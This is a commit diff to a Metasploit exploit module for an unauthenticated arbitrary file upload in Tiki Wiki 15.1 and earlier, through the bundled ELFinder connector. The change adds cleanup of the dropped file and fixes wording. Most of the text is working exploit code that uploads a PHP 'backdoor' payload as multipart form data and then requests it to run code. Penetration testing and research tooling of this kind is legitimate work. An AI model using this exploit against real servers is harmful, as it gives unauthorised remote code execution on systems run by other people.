Add FileDropper to cleanup properly
wchen-r7
parent
43833c8756
commit
2471e8bc8c
|
|
@ -9,6 +9,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
include Msf::Exploit::FileDropper
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
|
|
@ -16,7 +17,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'Description' => %q{
|
||||
This module exploits a file upload vulnerability in Tiki Wiki <= 15.1
|
||||
which could be abused to allow unauthenticated users to execute arbitrary code
|
||||
under the context of the webserver user.
|
||||
under the context of the web server user.
|
||||
|
||||
The issue comes with one of the 3rd party components. Name of that components is
|
||||
ELFinder -version 2.0-. This components comes with default example page which
|
||||
|
|
@ -24,9 +25,9 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
Default configuration does not force validations such as file extension, content-type etc.
|
||||
Thus, unauthenticated user can upload PHP file.
|
||||
|
||||
The exploit has been tested on Debian 8.x 64bit and Tiki Wiki 15.1.
|
||||
The exploit has been tested on Debian 8.x 64-bit and Tiki Wiki 15.1.
|
||||
},
|
||||
'Author' =>
|
||||
'Author' =>
|
||||
[
|
||||
'Mehmet Ince <mehmet@mehmetince.net>' # Vulnerability discovery and Metasploit module
|
||||
],
|
||||
|
|
@ -60,30 +61,38 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'method' => 'GET',
|
||||
'uri' => url
|
||||
)
|
||||
|
||||
if res && res.code == 200
|
||||
return Exploit::CheckCode::Appears
|
||||
end
|
||||
|
||||
return Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
def exploit
|
||||
filename = rand_text_alpha(8 + rand(4)) + '.php'
|
||||
register_file_for_cleanup(filename)
|
||||
|
||||
data = Rex::MIME::Message.new
|
||||
data.add_part('upload', nil, nil, 'form-data; name="cmd"')
|
||||
data.add_part('l1_Lw', nil, nil, 'form-data; name="target"')
|
||||
data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"upload[]\"; filename=\"#{filename}\"")
|
||||
print_status("Uploading backdoor file.")
|
||||
|
||||
print_status("Uploading backdoor file: #{filename}")
|
||||
|
||||
res = send_request_cgi({
|
||||
'method' => 'POST',
|
||||
'uri' => normalize_uri(target_uri.path, "vendor_extra/elfinder/php/connector.minimal.php"),
|
||||
'ctype' => "multipart/form-data; boundary=#{data.bound}",
|
||||
'data' => data.to_s
|
||||
})
|
||||
|
||||
if res && res.code == 200
|
||||
print_good("Backdoor successfully created.")
|
||||
else
|
||||
fail_with(Failure::Unknown, "#{peer} - Error on uploading file")
|
||||
end
|
||||
|
||||
print_status("Trigging the exploit...")
|
||||
send_request_cgi({
|
||||
'method' => 'GET',
|
||||
|
|
|
|||
Loading…
Reference in New Issue